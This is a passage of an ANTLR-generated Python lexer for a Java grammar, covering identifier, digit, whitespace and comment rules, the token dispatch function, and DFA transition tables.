if self.input.LA(1) == 36 or (65 <= self.input.LA(1) <= 90) or self.input.LA(1) == 95 or (97 <= self.input.LA(1) <= 122) or (192 <= self.input.LA(1) <= 214) or (216 <= self.input.LA(1) <= 246) or (248 <= self.input.LA(1) <= 8191) or (12352 <= self.input.LA(1) <= 12687) or (13056 <= self.input.LA(1) <= 13183) or (13312 <= self.input.LA(1) <= 15661) or (19968 <= self.input.LA(1) <= 40959) or (63744 <= self.input.LA(1) <= 64255):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "Letter"
# $ANTLR start "JavaIDDigit"
def mJavaIDDigit(self, ):
try:
# ./Java.g:1563:5: ( '\\u0030' .. '\\u0039' | '\\u0660' .. '\\u0669' | '\\u06f0' .. '\\u06f9' | '\\u0966' .. '\\u096f' | '\\u09e6' .. '\\u09ef' | '\\u0a66' .. '\\u0a6f' | '\\u0ae6' .. '\\u0aef' | '\\u0b66' .. '\\u0b6f' | '\\u0be7' .. '\\u0bef' | '\\u0c66' .. '\\u0c6f' | '\\u0ce6' .. '\\u0cef' | '\\u0d66' .. '\\u0d6f' | '\\u0e50' .. '\\u0e59' | '\\u0ed0' .. '\\u0ed9' | '\\u1040' .. '\\u1049' )
# ./Java.g:
pass
if (48 <= self.input.LA(1) <= 57) or (1632 <= self.input.LA(1) <= 1641) or (1776 <= self.input.LA(1) <= 1785) or (2406 <= self.input.LA(1) <= 2415) or (2534 <= self.input.LA(1) <= 2543) or (2662 <= self.input.LA(1) <= 2671) or (2790 <= self.input.LA(1) <= 2799) or (2918 <= self.input.LA(1) <= 2927) or (3047 <= self.input.LA(1) <= 3055) or (3174 <= self.input.LA(1) <= 3183) or (3302 <= self.input.LA(1) <= 3311) or (3430 <= self.input.LA(1) <= 3439) or (3664 <= self.input.LA(1) <= 3673) or (3792 <= self.input.LA(1) <= 3801) or (4160 <= self.input.LA(1) <= 4169):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
finally:
pass
# $ANTLR end "JavaIDDigit"
# $ANTLR start "WS"
def mWS(self, ):
try:
_type = WS
_channel = DEFAULT_CHANNEL
# ./Java.g:1580:5: ( ( ' ' | '\\r' | '\\t' | '\\u000C' | '\\n' ) )
# ./Java.g:1580:8: ( ' ' | '\\r' | '\\t' | '\\u000C' | '\\n' )
pass
if (9 <= self.input.LA(1) <= 10) or (12 <= self.input.LA(1) <= 13) or self.input.LA(1) == 32:
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
#action start
_channel=HIDDEN;
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "WS"
# $ANTLR start "COMMENT"
def mCOMMENT(self, ):
try:
_type = COMMENT
_channel = DEFAULT_CHANNEL
# ./Java.g:1584:5: ( '/*' ( options {greedy=false; } : . )* '*/' )
# ./Java.g:1584:9: '/*' ( options {greedy=false; } : . )* '*/'
pass
self.match("/*")
# ./Java.g:1584:14: ( options {greedy=false; } : . )*
while True: #loop26
alt26 = 2
LA26_0 = self.input.LA(1)
if (LA26_0 == 42) :
LA26_1 = self.input.LA(2)
if (LA26_1 == 47) :
alt26 = 2
elif ((0 <= LA26_1 <= 46) or (48 <= LA26_1 <= 65534)) :
alt26 = 1
elif ((0 <= LA26_0 <= 41) or (43 <= LA26_0 <= 65534)) :
alt26 = 1
if alt26 == 1:
# ./Java.g:1584:41: .
pass
self.matchAny()
else:
break #loop26
self.match("*/")
#action start
_channel=HIDDEN;
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "COMMENT"
# $ANTLR start "LINE_COMMENT"
def mLINE_COMMENT(self, ):
try:
_type = LINE_COMMENT
_channel = DEFAULT_CHANNEL
# ./Java.g:1588:5: ( '//' (~ ( '\\n' | '\\r' ) )* ( '\\r' )? '\\n' )
# ./Java.g:1588:7: '//' (~ ( '\\n' | '\\r' ) )* ( '\\r' )? '\\n'
pass
self.match("//")
# ./Java.g:1588:12: (~ ( '\\n' | '\\r' ) )*
while True: #loop27
alt27 = 2
LA27_0 = self.input.LA(1)
if ((0 <= LA27_0 <= 9) or (11 <= LA27_0 <= 12) or (14 <= LA27_0 <= 65534)) :
alt27 = 1
if alt27 == 1:
# ./Java.g:1588:12: ~ ( '\\n' | '\\r' )
pass
if (0 <= self.input.LA(1) <= 9) or (11 <= self.input.LA(1) <= 12) or (14 <= self.input.LA(1) <= 65534):
self.input.consume()
else:
mse = MismatchedSetException(None, self.input)
self.recover(mse)
raise mse
else:
break #loop27
# ./Java.g:1588:26: ( '\\r' )?
alt28 = 2
LA28_0 = self.input.LA(1)
if (LA28_0 == 13) :
alt28 = 1
if alt28 == 1:
# ./Java.g:1588:26: '\\r'
pass
self.match(13)
self.match(10)
#action start
_channel=HIDDEN;
#action end
self._state.type = _type
self._state.channel = _channel
finally:
pass
# $ANTLR end "LINE_COMMENT"
def mTokens(self):
# ./Java.g:1:8: ( T__114 | T__115 | T__116 | T__117 | T__118 | T__119 | T__120 | T__121 | T__122 | T__123 | T__124 | T__125 | T__126 | T__127 | T__128 | T__129 | T__130 | T__131 | T__132 | T__133 | T__134 | T__135 | T__136 | T__137 | T__138 | T__139 | T__140 | T__141 | T__142 | T__143 | T__144 | T__145 | T__146 | T__147 | T__148 | T__149 | T__150 | T__151 | T__152 | T__153 | T__154 | T__155 | T__156 | T__157 | T__158 | T__159 | T__160 | T__161 | T__162 | T__163 | T__164 | T__165 | T__166 | T__167 | T__168 | T__169 | T__170 | T__171 | T__172 | T__173 | T__174 | T__175 | T__176 | T__177 | T__178 | T__179 | T__180 | T__181 | T__182 | T__183 | T__184 | T__185 | T__186 | T__187 | T__188 | T__189 | T__190 | T__191 | T__192 | T__193 | T__194 | T__195 | T__196 | T__197 | T__198 | T__199 | T__200 | T__201 | T__202 | HexLiteral | DecimalLiteral | OctalLiteral | FloatingPointLiteral | CharacterLiteral | StringLiteral | ENUM | ASSERT | Identifier | WS | COMMENT | LINE_COMMENT )
alt29 = 101
alt29 = self.dfa29.predict(self.input)
if alt29 == 1:
# ./Java.g:1:10: T__114
pass
self.mT__114()
elif alt29 == 2:
# ./Java.g:1:17: T__115
pass
self.mT__115()
elif alt29 == 3:
# ./Java.g:1:24: T__116
pass
self.mT__116()
elif alt29 == 4:
# ./Java.g:1:31: T__117
pass
self.mT__117()
elif alt29 == 5:
# ./Java.g:1:38: T__118
pass
self.mT__118()
elif alt29 == 6:
# ./Java.g:1:45: T__119
pass
self.mT__119()
elif alt29 == 7:
# ./Java.g:1:52: T__120
pass
self.mT__120()
elif alt29 == 8:
# ./Java.g:1:59: T__121
pass
self.mT__121()
elif alt29 == 9:
# ./Java.g:1:66: T__122
pass
self.mT__122()
elif alt29 == 10:
# ./Java.g:1:73: T__123
pass
self.mT__123()
elif alt29 == 11:
# ./Java.g:1:80: T__124
pass
self.mT__124()
elif alt29 == 12:
# ./Java.g:1:87: T__125
pass
self.mT__125()
elif alt29 == 13:
# ./Java.g:1:94: T__126
pass
self.mT__126()
elif alt29 == 14:
# ./Java.g:1:101: T__127
pass
self.mT__127()
elif alt29 == 15:
# ./Java.g:1:108: T__128
pass
self.mT__128()
elif alt29 == 16:
# ./Java.g:1:115: T__129
pass
self.mT__129()
elif alt29 == 17:
# ./Java.g:1:122: T__130
pass
self.mT__130()
elif alt29 == 18:
# ./Java.g:1:129: T__131
pass
self.mT__131()
elif alt29 == 19:
# ./Java.g:1:136: T__132
pass
self.mT__132()
elif alt29 == 20:
# ./Java.g:1:143: T__133
pass
self.mT__133()
elif alt29 == 21:
# ./Java.g:1:150: T__134
pass
self.mT__134()
elif alt29 == 22:
# ./Java.g:1:157: T__135
pass
self.mT__135()
elif alt29 == 23:
# ./Java.g:1:164: T__136
pass
self.mT__136()
elif alt29 == 24:
# ./Java.g:1:171: T__137
pass
self.mT__137()
elif alt29 == 25:
# ./Java.g:1:178: T__138
pass
self.mT__138()
elif alt29 == 26:
# ./Java.g:1:185: T__139
pass
self.mT__139()
elif alt29 == 27:
# ./Java.g:1:192: T__140
pass
self.mT__140()
elif alt29 == 28:
# ./Java.g:1:199: T__141
pass
self.mT__141()
elif alt29 == 29:
# ./Java.g:1:206: T__142
pass
self.mT__142()
elif alt29 == 30:
# ./Java.g:1:213: T__143
pass
self.mT__143()
elif alt29 == 31:
# ./Java.g:1:220: T__144
pass
self.mT__144()
elif alt29 == 32:
# ./Java.g:1:227: T__145
pass
self.mT__145()
elif alt29 == 33:
# ./Java.g:1:234: T__146
pass
self.mT__146()
elif alt29 == 34:
# ./Java.g:1:241: T__147
pass
self.mT__147()
elif alt29 == 35:
# ./Java.g:1:248: T__148
pass
self.mT__148()
elif alt29 == 36:
# ./Java.g:1:255: T__149
pass
self.mT__149()
elif alt29 == 37:
# ./Java.g:1:262: T__150
pass
self.mT__150()
elif alt29 == 38:
# ./Java.g:1:269: T__151
pass
self.mT__151()
elif alt29 == 39:
# ./Java.g:1:276: T__152
pass
self.mT__152()
elif alt29 == 40:
# ./Java.g:1:283: T__153
pass
self.mT__153()
elif alt29 == 41:
# ./Java.g:1:290: T__154
pass
self.mT__154()
elif alt29 == 42:
# ./Java.g:1:297: T__155
pass
self.mT__155()
elif alt29 == 43:
# ./Java.g:1:304: T__156
pass
self.mT__156()
elif alt29 == 44:
# ./Java.g:1:311: T__157
pass
self.mT__157()
elif alt29 == 45:
# ./Java.g:1:318: T__158
pass
self.mT__158()
elif alt29 == 46:
# ./Java.g:1:325: T__159
pass
self.mT__159()
elif alt29 == 47:
# ./Java.g:1:332: T__160
pass
self.mT__160()
elif alt29 == 48:
# ./Java.g:1:339: T__161
pass
self.mT__161()
elif alt29 == 49:
# ./Java.g:1:346: T__162
pass
self.mT__162()
elif alt29 == 50:
# ./Java.g:1:353: T__163
pass
self.mT__163()
elif alt29 == 51:
# ./Java.g:1:360: T__164
pass
self.mT__164()
elif alt29 == 52:
# ./Java.g:1:367: T__165
pass
self.mT__165()
elif alt29 == 53:
# ./Java.g:1:374: T__166
pass
self.mT__166()
elif alt29 == 54:
# ./Java.g:1:381: T__167
pass
self.mT__167()
elif alt29 == 55:
# ./Java.g:1:388: T__168
pass
self.mT__168()
elif alt29 == 56:
# ./Java.g:1:395: T__169
pass
self.mT__169()
elif alt29 == 57:
# ./Java.g:1:402: T__170
pass
self.mT__170()
elif alt29 == 58:
# ./Java.g:1:409: T__171
pass
self.mT__171()
elif alt29 == 59:
# ./Java.g:1:416: T__172
pass
self.mT__172()
elif alt29 == 60:
# ./Java.g:1:423: T__173
pass
self.mT__173()
elif alt29 == 61:
# ./Java.g:1:430: T__174
pass
self.mT__174()
elif alt29 == 62:
# ./Java.g:1:437: T__175
pass
self.mT__175()
elif alt29 == 63:
# ./Java.g:1:444: T__176
pass
self.mT__176()
elif alt29 == 64:
# ./Java.g:1:451: T__177
pass
self.mT__177()
elif alt29 == 65:
# ./Java.g:1:458: T__178
pass
self.mT__178()
elif alt29 == 66:
# ./Java.g:1:465: T__179
pass
self.mT__179()
elif alt29 == 67:
# ./Java.g:1:472: T__180
pass
self.mT__180()
elif alt29 == 68:
# ./Java.g:1:479: T__181
pass
self.mT__181()
elif alt29 == 69:
# ./Java.g:1:486: T__182
pass
self.mT__182()
elif alt29 == 70:
# ./Java.g:1:493: T__183
pass
self.mT__183()
elif alt29 == 71:
# ./Java.g:1:500: T__184
pass
self.mT__184()
elif alt29 == 72:
# ./Java.g:1:507: T__185
pass
self.mT__185()
elif alt29 == 73:
# ./Java.g:1:514: T__186
pass
self.mT__186()
elif alt29 == 74:
# ./Java.g:1:521: T__187
pass
self.mT__187()
elif alt29 == 75:
# ./Java.g:1:528: T__188
pass
self.mT__188()
elif alt29 == 76:
# ./Java.g:1:535: T__189
pass
self.mT__189()
elif alt29 == 77:
# ./Java.g:1:542: T__190
pass
self.mT__190()
elif alt29 == 78:
# ./Java.g:1:549: T__191
pass
self.mT__191()
elif alt29 == 79:
# ./Java.g:1:556: T__192
pass
self.mT__192()
elif alt29 == 80:
# ./Java.g:1:563: T__193
pass
self.mT__193()
elif alt29 == 81:
# ./Java.g:1:570: T__194
pass
self.mT__194()
elif alt29 == 82:
# ./Java.g:1:577: T__195
pass
self.mT__195()
elif alt29 == 83:
# ./Java.g:1:584: T__196
pass
self.mT__196()
elif alt29 == 84:
# ./Java.g:1:591: T__197
pass
self.mT__197()
elif alt29 == 85:
# ./Java.g:1:598: T__198
pass
self.mT__198()
elif alt29 == 86:
# ./Java.g:1:605: T__199
pass
self.mT__199()
elif alt29 == 87:
# ./Java.g:1:612: T__200
pass
self.mT__200()
elif alt29 == 88:
# ./Java.g:1:619: T__201
pass
self.mT__201()
elif alt29 == 89:
# ./Java.g:1:626: T__202
pass
self.mT__202()
elif alt29 == 90:
# ./Java.g:1:633: HexLiteral
pass
self.mHexLiteral()
elif alt29 == 91:
# ./Java.g:1:644: DecimalLiteral
pass
self.mDecimalLiteral()
elif alt29 == 92:
# ./Java.g:1:659: OctalLiteral
pass
self.mOctalLiteral()
elif alt29 == 93:
# ./Java.g:1:672: FloatingPointLiteral
pass
self.mFloatingPointLiteral()
elif alt29 == 94:
# ./Java.g:1:693: CharacterLiteral
pass
self.mCharacterLiteral()
elif alt29 == 95:
# ./Java.g:1:710: StringLiteral
pass
self.mStringLiteral()
elif alt29 == 96:
# ./Java.g:1:724: ENUM
pass
self.mENUM()
elif alt29 == 97:
# ./Java.g:1:729: ASSERT
pass
self.mASSERT()
elif alt29 == 98:
# ./Java.g:1:736: Identifier
pass
self.mIdentifier()
elif alt29 == 99:
# ./Java.g:1:747: WS
pass
self.mWS()
elif alt29 == 100:
# ./Java.g:1:750: COMMENT
pass
self.mCOMMENT()
elif alt29 == 101:
# ./Java.g:1:758: LINE_COMMENT
pass
self.mLINE_COMMENT()
# lookup tables for DFA #18
DFA18_eot = DFA.unpack(
u"\6\uffff"
)
DFA18_eof = DFA.unpack(
u"\6\uffff"
)
DFA18_min = DFA.unpack(
u"\2\56\4\uffff"
)
DFA18_max = DFA.unpack(
u"\1\71\1\146\4\uffff"
)
DFA18_accept = DFA.unpack(
u"\2\uffff\1\2\1\4\1\3\1\1"
)
DFA18_special = DFA.unpack(
u"\6\uffff"
)
DFA18_transition = [
DFA.unpack(u"\1\2\1\uffff\12\1"),
DFA.unpack(u"\1\5\1\uffff\12\1\12\uffff\1\3\1\4\1\3\35\uffff\1\3"
u"\1\4\1\3"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"")
]
# class definition for DFA #18
DFA18 = DFA
# lookup tables for DFA #29
DFA29_eot = DFA.unpack(
u"\1\uffff\1\55\1\uffff\2\55\1\73\1\76\2\55\3\uffff\1\110\2\uffff"
u"\1\55\2\uffff\1\55\1\115\4\55\3\uffff\1\55\2\uffff\2\55\1\137\1"
u"\142\1\146\1\151\1\153\1\155\1\157\1\uffff\1\55\2\164\4\uffff\5"
u"\55\1\175\5\55\5\uffff\7\55\3\uffff\3\55\2\uffff\10\55\1\u009c"
u"\6\55\23\uffff\2\55\1\uffff\1\u00a5\1\uffff\1\164\5\55\1\u00ad"
u"\1\55\1\uffff\23\55\1\u00c2\7\55\1\u00ca\2\55\1\uffff\2\55\1\u00cf"
u"\5\55\1\uffff\7\55\1\uffff\10\55\1\u00e4\1\55\1\u00e6\2\55\1\u00e9"
u"\1\u00ea\1\u00eb\2\55\1\u00ee\1\u00ef\1\uffff\2\55\1\u00f2\1\55"
u"\1\u00f4\2\55\1\uffff\3\55\1\u00fa\1\uffff\17\55\1\u010a\1\u010b"
u"\2\55\1\u010e\1\uffff\1\u010f\1\uffff\2\55\3\uffff\1\55\1\u0114"
u"\2\uffff\2\55\1\uffff\1\u0117\1\uffff\1\u0118\1\u0119\1\u011b\2"
u"\55\1\uffff\1\55\1\u011f\4\55\1\u0124\2\55\1\u0127\3\55\1\u012b"
u"\1\55\2\uffff\1\u012d\1\55\2\uffff\3\55\1\u0132\1\uffff\2\55\3"
u"\uffff\1\55\1\uffff\1\u0136\1\55\1\u0138\1\uffff\1\u0139\1\55\1"
u"\u013b\1\u013c\1\uffff\1\55\1\u013e\1\uffff\3\55\1\uffff\1\55\1"
u"\uffff\2\55\1\u0145\1\55\1\uffff\1\55\1\u0148\1\u0149\1\uffff\1"
u"\u014a\2\uffff\1\55\2\uffff\1\55\1\uffff\3\55\1\u0150\1\55\1\u0152"
u"\1\uffff\1\u0153\1\55\3\uffff\1\u0155\1\u0156\1\55\1\u0158\1\55"
u"\1\uffff\1\55\2\uffff\1\u015b\2\uffff\1\u015c\1\uffff\1\u015d\1"
u"\55\3\uffff\1\55\1\u0160\1\uffff"
)
DFA29_eof = DFA.unpack(
u"\u0161\uffff"
)
DFA29_min = DFA.unpack(
u"\1\11\1\141\1\uffff\1\146\1\150\1\56\1\75\1\141\1\154\3\uffff\1"
u"\46\2\uffff\1\157\2\uffff\1\150\1\75\2\157\1\141\1\145\3\uffff"
u"\1\141\2\uffff\1\150\1\145\1\53\1\55\1\52\4\75\1\uffff\1\142\2"
u"\56\4\uffff\1\143\1\142\1\151\1\160\1\163\1\44\1\141\1\157\1\160"
u"\1\151\1\156\5\uffff\2\141\1\163\1\156\1\164\1\163\1\165\3\uffff"
u"\2\151\1\141\2\uffff\1\157\1\164\1\145\1\156\1\157\1\154\1\162"
u"\1\156\1\44\1\146\1\154\1\167\1\164\1\151\1\164\23\uffff\2\163"
u"\1\uffff\1\56\1\uffff\1\56\1\153\1\154\1\164\1\166\1\154\1\44\1"
u"\164\1\uffff\1\164\1\151\1\162\1\145\1\164\1\143\1\163\1\162\1"
u"\143\1\145\1\164\2\145\1\155\1\144\1\141\1\157\1\163\1\145\1\44"
u"\1\156\1\154\1\145\1\141\1\147\1\141\1\163\1\44\1\141\1\142\1\uffff"
u"\1\141\1\154\1\44\1\151\1\154\1\165\1\164\1\145\1\uffff\1\141\1"
u"\151\1\145\1\141\1\162\1\145\1\162\1\uffff\1\141\1\151\1\143\1"
u"\164\1\162\1\143\1\150\1\163\1\44\1\150\1\44\1\151\1\156\3\44\1"
u"\164\1\167\2\44\1\uffff\1\163\1\145\1\44\1\153\1\44\1\164\1\145"
u"\1\uffff\2\154\1\165\1\44\1\uffff\1\166\1\145\3\162\1\147\2\143"
u"\2\164\1\155\1\146\1\156\1\143\1\164\2\44\1\150\1\162\1\44\1\uffff"
u"\1\44\1\uffff\1\156\1\144\3\uffff\1\151\1\44\2\uffff\1\151\1\141"
u"\1\uffff\1\44\1\uffff\3\44\1\145\1\154\1\uffff\1\145\1\44\1\156"
u"\1\141\1\164\1\145\1\44\1\164\1\145\1\44\1\145\1\141\1\143\1\44"
u"\1\146\2\uffff\1\44\1\157\2\uffff\1\165\1\163\1\154\1\44\1\uffff"
u"\1\145\1\156\3\uffff\1\171\1\uffff\1\44\1\164\1\44\1\uffff\1\44"
u"\1\143\2\44\1\uffff\1\145\1\44\1\uffff\1\156\1\143\1\145\1\uffff"
u"\1\160\1\uffff\1\156\1\145\1\44\1\145\1\uffff\1\156\2\44\1\uffff"
u"\1\44\2\uffff\1\164\2\uffff\1\144\1\uffff\1\164\1\145\1\157\1\44"
u"\1\151\1\44\1\uffff\1\44\1\164\3\uffff\2\44\1\163\1\44\1\146\1"
u"\uffff\1\172\2\uffff\1\44\2\uffff\1\44\1\uffff\1\44\1\145\3\uffff"
u"\1\144\1\44\1\uffff"
)
DFA29_max = DFA.unpack(
u"\1\ufaff\1\165\1\uffff\1\156\1\171\1\71\1\75\1\157\1\170\3\uffff"
u"\1\75\2\uffff\1\157\2\uffff\1\162\1\75\1\171\3\157\3\uffff\1\165"
u"\2\uffff\1\150\1\145\3\75\1\174\3\75\1\uffff\1\163\1\170\1\146"
u"\4\uffff\1\143\1\142\1\157\1\160\1\164\1\ufaff\1\162\1\157\1\160"
u"\1\151\1\156\5\uffff\2\141\1\164\1\156\1\164\1\163\1\165\3\uffff"
u"\1\154\1\162\1\171\2\uffff\1\157\1\164\1\145\1\156\1\157\1\154"
u"\1\162\1\156\1\ufaff\1\146\1\154\1\167\1\164\1\151\1\164\23\uffff"
u"\2\163\1\uffff\1\146\1\uffff\1\146\1\153\1\154\1\164\1\166\1\157"
u"\1\ufaff\1\164\1\uffff\1\164\1\151\1\162\1\145\1\164\1\143\1\163"
u"\1\162\1\143\1\145\1\164\2\145\1\155\1\144\1\141\1\157\1\163\1"
u"\145\1\ufaff\1\156\1\154\1\145\1\141\1\147\1\141\1\163\1\ufaff"
u"\1\141\1\142\1\uffff\1\141\1\154\1\ufaff\1\151\1\154\1\165\1\164"
u"\1\145\1\uffff\1\141\1\151\1\145\1\141\1\162\1\145\1\162\1\uffff"
u"\1\141\1\151\1\143\1\164\1\162\1\143\1\150\1\163\1\ufaff\1\150"
u"\1\ufaff\1\151\1\156\3\ufaff\1\164\1\167\2\ufaff\1\uffff\1\163"
u"\1\145\1\ufaff\1\153\1\ufaff\1\164\1\145\1\uffff\2\154\1\165\1"
u"\ufaff\1\uffff\1\166\1\145\3\162\1\147\2\143\2\164\1\155\1\146"
u"\1\156\1\143\1\164\2\ufaff\1\150\1\162\1\ufaff\1\uffff\1\ufaff"
u"\1\uffff\1\156\1\144\3\uffff\1\151\1\ufaff\2\uffff\1\151\1\141"
u"\1\uffff\1\ufaff\1\uffff\3\ufaff\1\145\1\154\1\uffff\1\145\1\ufaff"
u"\1\156\1\141\1\164\1\145\1\ufaff\1\164\1\145\1\ufaff\1\145\1\141"
u"\1\143\1\ufaff\1\146\2\uffff\1\ufaff\1\157\2\uffff\1\165\1\163"
u"\1\154\1\ufaff\1\uffff\1\145\1\156\3\uffff\1\171\1\uffff\1\ufaff"
u"\1\164\1\ufaff\1\uffff\1\ufaff\1\143\2\ufaff\1\uffff\1\145\1\ufaff"
u"\1\uffff\1\156\1\143\1\145\1\uffff\1\160\1\uffff\1\156\1\145\1"
u"\ufaff\1\145\1\uffff\1\156\2\ufaff\1\uffff\1\ufaff\2\uffff\1\164"
u"\2\uffff\1\144\1\uffff\1\164\1\145\1\157\1\ufaff\1\151\1\ufaff"
u"\1\uffff\1\ufaff\1\164\3\uffff\2\ufaff\1\163\1\ufaff\1\146\1\uffff"
u"\1\172\2\uffff\1\ufaff\2\uffff\1\ufaff\1\uffff\1\ufaff\1\145\3"
u"\uffff\1\144\1\ufaff\1\uffff"
)
DFA29_accept = DFA.unpack(
u"\2\uffff\1\2\6\uffff\1\12\1\13\1\14\1\uffff\1\16\1\17\1\uffff\1"
u"\22\1\23\6\uffff\1\36\1\40\1\41\1\uffff\1\47\1\51\11\uffff\1\116"
u"\3\uffff\1\136\1\137\1\142\1\143\13\uffff\1\42\1\5\1\135\1\73\1"
u"\6\7\uffff\1\75\1\102\1\15\3\uffff\1\105\1\25\17\uffff\1\71\1\114"
u"\1\110\1\72\1\115\1\111\1\74\1\144\1\145\1\112\1\76\1\101\1\103"
u"\1\77\1\104\1\100\1\113\1\106\1\117\2\uffff\1\132\1\uffff\1\133"
u"\10\uffff\1\52\36\uffff\1\56\10\uffff\1\134\7\uffff\1\32\24\uffff"
u"\1\57\7\uffff\1\54\4\uffff\1\120\24\uffff\1\27\1\uffff\1\70\2\uffff"
u"\1\53\1\140\1\21\2\uffff\1\43\1\44\2\uffff\1\30\1\uffff\1\33\5"
u"\uffff\1\46\17\uffff\1\31\1\37\2\uffff\1\7\1\60\4\uffff\1\65\2"
u"\uffff\1\66\1\34\1\45\1\uffff\1\125\3\uffff\1\55\4\uffff\1\121"
u"\2\uffff\1\3\3\uffff\1\4\1\uffff\1\62\4\uffff\1\24\3\uffff\1\35"
u"\1\uffff\1\126\1\64\1\uffff\1\141\1\1\1\uffff\1\123\6\uffff\1\10"
u"\2\uffff\1\26\1\61\1\50\5\uffff\1\131\1\uffff\1\67\1\130\1\uffff"
u"\1\124\1\122\1\uffff\1\20\2\uffff\1\127\1\11\1\107\2\uffff\1\63"
)
DFA29_special = DFA.unpack(
u"\u0161\uffff"
)
DFA29_transition = [
DFA.unpack(u"\2\56\1\uffff\2\56\22\uffff\1\56\1\46\1\54\1\uffff\1"
u"\55\1\45\1\14\1\53\1\31\1\32\1\6\1\40\1\12\1\41\1\5\1\42\1\51\11"
u"\52\1\35\1\2\1\11\1\23\1\13\1\30\1\34\32\55\1\20\1\uffff\1\21\1"
u"\44\1\55\1\uffff\1\50\1\24\1\7\1\27\1\10\1\26\2\55\1\3\2\55\1\25"
u"\1\55\1\33\1\55\1\1\1\55\1\37\1\4\1\22\1\55\1\17\1\36\3\55\1\15"
u"\1\43\1\16\1\47\101\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55"
u"\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55"
u"\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\57\20\uffff\1\61\2\uffff\1\60"),
DFA.unpack(u""),
DFA.unpack(u"\1\64\6\uffff\1\62\1\63"),
DFA.unpack(u"\1\66\13\uffff\1\65\1\67\1\uffff\1\70\1\uffff\1\71"),
DFA.unpack(u"\1\72\1\uffff\12\74"),
DFA.unpack(u"\1\75"),
DFA.unpack(u"\1\101\6\uffff\1\100\3\uffff\1\77\2\uffff\1\102"),
DFA.unpack(u"\1\104\1\uffff\1\105\11\uffff\1\103"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\107\26\uffff\1\106"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\111"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\112\11\uffff\1\113"),
DFA.unpack(u"\1\114"),
DFA.unpack(u"\1\116\2\uffff\1\120\6\uffff\1\117"),
DFA.unpack(u"\1\121"),
DFA.unpack(u"\1\123\7\uffff\1\125\2\uffff\1\122\2\uffff\1\124"),
DFA.unpack(u"\1\127\11\uffff\1\126"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\132\3\uffff\1\131\17\uffff\1\130"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\133"),
DFA.unpack(u"\1\134"),
DFA.unpack(u"\1\136\21\uffff\1\135"),
DFA.unpack(u"\1\141\17\uffff\1\140"),
DFA.unpack(u"\1\144\4\uffff\1\145\15\uffff\1\143"),
DFA.unpack(u"\1\147\76\uffff\1\150"),
DFA.unpack(u"\1\152"),
DFA.unpack(u"\1\154"),
DFA.unpack(u"\1\156"),
DFA.unpack(u""),
DFA.unpack(u"\1\160\20\uffff\1\161"),
DFA.unpack(u"\1\74\1\uffff\10\163\2\74\12\uffff\3\74\21\uffff\1"
u"\162\13\uffff\3\74\21\uffff\1\162"),
DFA.unpack(u"\1\74\1\uffff\12\165\12\uffff\3\74\35\uffff\3\74"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\166"),
DFA.unpack(u"\1\167"),
DFA.unpack(u"\1\171\5\uffff\1\170"),
DFA.unpack(u"\1\172"),
DFA.unpack(u"\1\174\1\173"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\176\20\uffff\1\177"),
DFA.unpack(u"\1\u0080"),
DFA.unpack(u"\1\u0081"),
DFA.unpack(u"\1\u0082"),
DFA.unpack(u"\1\u0083"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0084"),
DFA.unpack(u"\1\u0085"),
DFA.unpack(u"\1\u0087\1\u0086"),
DFA.unpack(u"\1\u0088"),
DFA.unpack(u"\1\u0089"),
DFA.unpack(u"\1\u008a"),
DFA.unpack(u"\1\u008b"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u008c\2\uffff\1\u008d"),
DFA.unpack(u"\1\u008f\10\uffff\1\u008e"),
DFA.unpack(u"\1\u0092\23\uffff\1\u0090\3\uffff\1\u0091"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0093"),
DFA.unpack(u"\1\u0094"),
DFA.unpack(u"\1\u0095"),
DFA.unpack(u"\1\u0096"),
DFA.unpack(u"\1\u0097"),
DFA.unpack(u"\1\u0098"),
DFA.unpack(u"\1\u0099"),
DFA.unpack(u"\1\u009a"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\24\55\1\u009b\5\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u009d"),
DFA.unpack(u"\1\u009e"),
DFA.unpack(u"\1\u009f"),
DFA.unpack(u"\1\u00a0"),
DFA.unpack(u"\1\u00a1"),
DFA.unpack(u"\1\u00a2"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
